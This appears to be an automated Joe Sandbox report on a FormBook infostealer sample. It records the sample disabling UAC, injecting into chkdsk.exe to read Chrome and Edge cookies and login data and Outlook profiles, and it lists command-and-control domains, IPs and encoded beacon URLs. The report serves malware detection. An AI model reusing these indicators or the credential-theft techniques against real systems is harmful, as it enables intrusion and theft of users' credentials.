Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\H25iQbxCki.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Users\user\Desktop\H25iQbxCki.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.2.ilasm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ilasm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1869984902.0000000005ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4144364221.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4145287645.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4144410750.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4145259981.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1870033073.0000000005F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.2.ilasm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ilasm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1869984902.0000000005ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4144364221.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4145287645.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4144410750.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4145259981.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1870033073.0000000005F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	512 Process Injection	21 Disable or Modify Tools	1 OS Credential Dumping	241 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	151 Virtualization/Sandbox Evasion	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	512 Process Injection	Security Account Manager	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Abuse Elevation Control Mechanism	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
H25iQbxCki.exe	43%	Virustotal		Browse
H25iQbxCki.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Swotter
H25iQbxCki.exe	100%	Avira	TR/AD.Swotter.paoia

Source	Detection	Scanner	Link
carliente.com	1%	Virustotal	Browse
lenslaser.com	0%	Virustotal	Browse
zhs.zohosites.com	0%	Virustotal	Browse
www.prizesupermarket.com	0%	Virustotal	Browse
www.alfaspa.net	0%	Virustotal	Browse
www.celebration24.co.uk	1%	Virustotal	Browse
www.gledingakademiet.no	1%	Virustotal	Browse
www.zwervertjes.be	0%	Virustotal	Browse
www.carliente.com	1%	Virustotal	Browse
www.allinone24.shop	0%	Virustotal	Browse
www.jrksa.info	2%	Virustotal	Browse
www.lenslaser.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.celebration24.co.uk/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=WM8YJa5qA0NkIP/fN4mRPH2hsfvjO1kWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WN5VMBaPcH6h4tJWWqH5H+VkhDr+c9eHm1vWk=	0%	Avira URL Cloud	safe
http://www.deaybrid.info/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=Z7d5vO3PiPWE/zeJlxtYmOYnF8uMEonypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08U8eULhaLH/eruf+vtSehKJ3r2fKzbVPqM3Ks=	0%	Avira URL Cloud	safe
http://www.carliente.com/mcz6/	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.walletweb367.top/mcz6/?abN=+LASaW8sLlti/Y5p1q0qKU3hQBfGLeZfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6VqrKvXOipPExFwKQmiwKnwFMVTTGbdQXrJvJk=&HV8hD=_ZnHYJfHNd6deTQP	0%	Avira URL Cloud	safe
https://www.zoho.com/sites/?src=parkeddomain&dr=www.jrksa.info	0%	Avira URL Cloud	safe
http://www.jrksa.info/mcz6/	0%	Avira URL Cloud	safe
http://www.carliente.com/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=t2ltNu02BWCxFJkMInGc7SUNVmZAlmpo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33J3w7E/1DXRKVU7+ltx/Ze5a9KKXUCEtCgjk=	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://www.zoho.com/sites/images/professionally-crafted-themes.png	0%	Avira URL Cloud	safe
http://www.lenslaser.com/mcz6/?abN=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&HV8hD=_ZnHYJfHNd6deTQP	0%	Avira URL Cloud	safe
http://www.zwervertjes.be/mcz6/?abN=qn3zkYHztMKe8mzud8vq3qgzcmJ7Jd4FLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOPCWB0khZATxvEtVM+0yJiG12ulMvj5DktkI=&HV8hD=_ZnHYJfHNd6deTQP	0%	Avira URL Cloud	safe
https://www.zoho.com/sites/?src=parkeddomain&dr=www.jrksa.info	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.zoho.com/sites/images/professionally-crafted-themes.png	0%	Virustotal		Browse
http://www.allinone24.shop/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98=	0%	Avira URL Cloud	safe
http://upx.sf.net	0%	Avira URL Cloud	safe
http://www.allinone24.shop/mcz6/	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
http://www.jrksa.info/mcz6/	1%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://www.ecosia.org/newtab/	0%	Avira URL Cloud	safe
http://www.allinone24.shop	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Virustotal		Browse
http://www.lenslaser.com/mcz6/	0%	Avira URL Cloud	safe
http://www.allinone24.shop/mcz6/	2%	Virustotal		Browse
http://www.jrksa.info/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=5d/f0hfwoo/9d3f97tbdjxDk4KU85C4YC37M3UWhy4ALmXvbgMxGv66I6qe5jd4u2tKoxygbv/cknJWC1exftQvP2lviqJawgXV46wbQMN+Gc/xUQSNa8ks=	0%	Avira URL Cloud	safe
https://www.ecosia.org/newtab/	0%	Virustotal		Browse
https://www.fastmail.help/hc/en-us/articles/1500000280141	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
http://www.lenslaser.com/mcz6/	1%	Virustotal		Browse
http://upx.sf.net	0%	Virustotal		Browse
https://www.fastmail.help/hc/en-us/articles/1500000280141	0%	Virustotal		Browse
http://www.allinone24.shop	0%	Virustotal		Browse
http://www.walletweb367.top/mcz6/	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	Avira URL Cloud	safe
http://www.deaybrid.info/mcz6/	0%	Avira URL Cloud	safe
https://www.fastmailusercontent.com/filestorage/css/main.css	0%	Avira URL Cloud	safe
http://www.zwervertjes.be/mcz6/	0%	Avira URL Cloud	safe
http://www.gledingakademiet.no/mcz6/	0%	Avira URL Cloud	safe
https://www.allinone24.shop/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0q	0%	Avira URL Cloud	safe
https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb	0%	Avira URL Cloud	safe
http://www.celebration24.co.uk/mcz6/	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	Avira URL Cloud	safe
https://www.strato.de	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
carliente.com	217.160.0.111	true	true	1%, Virustotal, Browse	unknown
lenslaser.com	162.241.216.140	true	true	0%, Virustotal, Browse	unknown
zhs.zohosites.com	136.143.186.12	true	true	0%, Virustotal, Browse	unknown
allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai	57.151.38.169	true	true		unknown
www.deaybrid.info	162.0.237.22	true	true		unknown
www.gledingakademiet.no	104.37.39.71	true	true	1%, Virustotal, Browse	unknown
www.celebration24.co.uk	103.168.172.37	true	true	1%, Virustotal, Browse	unknown
www.zwervertjes.be	199.59.243.225	true	true	0%, Virustotal, Browse	unknown
www.walletweb367.top	91.195.240.123	true	true		unknown
www.cookedatthebottom.com	unknown	unknown	true		unknown
www.prizesupermarket.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.alfaspa.net	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.polhi.lol	unknown	unknown	true		unknown
www.dty377.com	unknown	unknown	true		unknown
www.lenslaser.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.jrksa.info	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.maerealtysg.com	unknown	unknown	true		unknown
www.allinone24.shop	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.carliente.com	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.deaybrid.info/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=Z7d5vO3PiPWE/zeJlxtYmOYnF8uMEonypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08U8eULhaLH/eruf+vtSehKJ3r2fKzbVPqM3Ks=	true	Avira URL Cloud: safe	unknown
http://www.celebration24.co.uk/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=WM8YJa5qA0NkIP/fN4mRPH2hsfvjO1kWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WN5VMBaPcH6h4tJWWqH5H+VkhDr+c9eHm1vWk=	true	Avira URL Cloud: safe	unknown
http://www.carliente.com/mcz6/	true	Avira URL Cloud: safe	unknown
http://www.walletweb367.top/mcz6/?abN=+LASaW8sLlti/Y5p1q0qKU3hQBfGLeZfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6VqrKvXOipPExFwKQmiwKnwFMVTTGbdQXrJvJk=&HV8hD=_ZnHYJfHNd6deTQP	true	Avira URL Cloud: safe	unknown
http://www.jrksa.info/mcz6/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.carliente.com/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=t2ltNu02BWCxFJkMInGc7SUNVmZAlmpo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33J3w7E/1DXRKVU7+ltx/Ze5a9KKXUCEtCgjk=	true	Avira URL Cloud: safe	unknown
http://www.lenslaser.com/mcz6/?abN=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&HV8hD=_ZnHYJfHNd6deTQP	true	Avira URL Cloud: safe	unknown
http://www.zwervertjes.be/mcz6/?abN=qn3zkYHztMKe8mzud8vq3qgzcmJ7Jd4FLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOPCWB0khZATxvEtVM+0yJiG12ulMvj5DktkI=&HV8hD=_ZnHYJfHNd6deTQP	true	Avira URL Cloud: safe	unknown
http://www.allinone24.shop/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98=	true	Avira URL Cloud: safe	unknown
http://www.allinone24.shop/mcz6/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.lenslaser.com/mcz6/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.jrksa.info/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=5d/f0hfwoo/9d3f97tbdjxDk4KU85C4YC37M3UWhy4ALmXvbgMxGv66I6qe5jd4u2tKoxygbv/cknJWC1exftQvP2lviqJawgXV46wbQMN+Gc/xUQSNa8ks=	true	Avira URL Cloud: safe	unknown
http://www.walletweb367.top/mcz6/	true	Avira URL Cloud: safe	unknown
http://www.deaybrid.info/mcz6/	true	Avira URL Cloud: safe	unknown
http://www.zwervertjes.be/mcz6/	true	Avira URL Cloud: safe	unknown
http://www.gledingakademiet.no/mcz6/	true	Avira URL Cloud: safe	unknown
http://www.celebration24.co.uk/mcz6/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.zoho.com/sites/?src=parkeddomain&dr=www.jrksa.info	chkdsk.exe, 0000000C.00000002.4146268881.0000000006694000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.0000000003F94000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.zoho.com/sites/images/professionally-crafted-themes.png	chkdsk.exe, 0000000C.00000002.4146268881.0000000006694000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.0000000003F94000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.9.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.allinone24.shop	uwZgUlCQSPVT.exe, 00000010.00000002.4145287645.0000000002B9D000.00000040.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.fastmail.help/hc/en-us/articles/1500000280141	chkdsk.exe, 0000000C.00000002.4146268881.00000000069B8000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.00000000042B8000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	chkdsk.exe, 0000000C.00000002.4146268881.0000000006E6E000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4148485195.0000000007EA0000.00000004.00000800.00020000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.000000000476E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.fastmailusercontent.com/filestorage/css/main.css	chkdsk.exe, 0000000C.00000002.4146268881.00000000069B8000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.00000000042B8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.allinone24.shop/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0q	chkdsk.exe, 0000000C.00000002.4146268881.0000000005D28000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.0000000003628000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb	chkdsk.exe, 0000000C.00000002.4146268881.0000000006694000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.0000000003F94000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.strato.de	uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.000000000394C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.168.172.37	www.celebration24.co.uk	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
136.143.186.12	zhs.zohosites.com	United States	2639	ZOHO-ASUS	true
104.37.39.71	www.gledingakademiet.no	Denmark	51468	ONECOMDK	true
217.160.0.111	carliente.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
162.0.237.22	www.deaybrid.info	Canada	22612	NAMECHEAP-NETUS	true
162.241.216.140	lenslaser.com	United States	46606	UNIFIEDLAYER-AS-1US	true
91.195.240.123	www.walletweb367.top	Germany	47846	SEDO-ASDE	true
57.151.38.169	allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai	Belgium	2686	ATGS-MMD-ASUS	true
199.59.243.225	www.zwervertjes.be	United States	395082	BODIS-NJUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1452335
Start date and time:	2024-06-05 15:04:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	H25iQbxCki.exe renamed because original name is a hash value
Original Sample Name:	0e7a378b14d45a01c31a3de6198273f1837ec450d2a9a457432896e1311023a6.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@17/11@16/9
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 85% Number of executed functions: 76 Number of non-executed functions: 260
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
